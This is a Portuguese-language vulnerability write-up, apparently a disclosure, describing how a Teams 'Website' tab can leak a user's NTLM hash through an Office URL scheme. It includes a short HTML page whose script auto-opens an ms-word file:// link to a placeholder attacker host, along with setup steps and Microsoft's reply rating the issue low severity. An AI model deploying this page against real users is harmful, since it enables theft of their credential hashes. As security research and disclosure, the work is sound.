
Vaze NTLM na aba Website do Teams via MS Office
Quando um usuário navega para uma aba "Website" que direciona para uma página web especialmente projetada, isso pode resultar na exposição do hash NTLM por meio da ativação de um esquema de URL do Office, reduzindo o processo a um clique para o vazamento.
Se alguém tentar abrir um link no formato ms-word:ofv|u|file://Share/File.docx a partir de um navegador, as seguintes etapas são necessárias:
O usuário deve confirmar sua intenção de abrir o Word.
O usuário deve reconhecer e aceitar os riscos indicados pela mensagem de aviso do MS Office.
No entanto, na aba Website, a ação do usuário é simplificada para apenas aceitar o risco.
<html>
<head>
<title>Auto Open Document</title>
</head>
<body>
<a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
<script>
window.onload = function() {
document.getElementById('autoOpenLink').click();
};
</script>
</body>
</html>
3. No Teams, configure uma aba "Website" que direcione para a página web que você acabou de configurar. 4. Acesse a "Aba".
Ao visitar a aba, um link acionado por JavaScript inicia automaticamente a abertura do Word. Se o usuário concordar com o prompt no Word clicando em "Sim", o hash NTLM será transmitido para a máquina do "atacante".

Na quarta-feira, 27 de março de 2024, 20:23, Microsoft Security Response Center <[email protected]mailto:[[email protected]](mailto:[email protected])> escreveu:
Olá,
Obrigado pela sua submissão. Determinamos que sua constatação é válida, mas não atende ao nosso critério para manutenção imediata porque a gravidade do problema é baixa. Nossos engenheiros indicaram que um usuário ainda teria que consentir no Word ou em outros clientes do Office antes que o NTLM fosse vazado, o que reduz a gravidade. No entanto, marcamos sua constatação para revisão futura como uma oportunidade de melhorar nossos produtos e como um problema de recurso a ser aprimorado. Não tenho um cronograma para essa revisão. Como nenhuma ação adicional é necessária neste momento, estou encerrando este caso.
Atenciosamente,
MSRC
Parece corrigido na versão 24033.813.2773.520 do Microsoft Teams.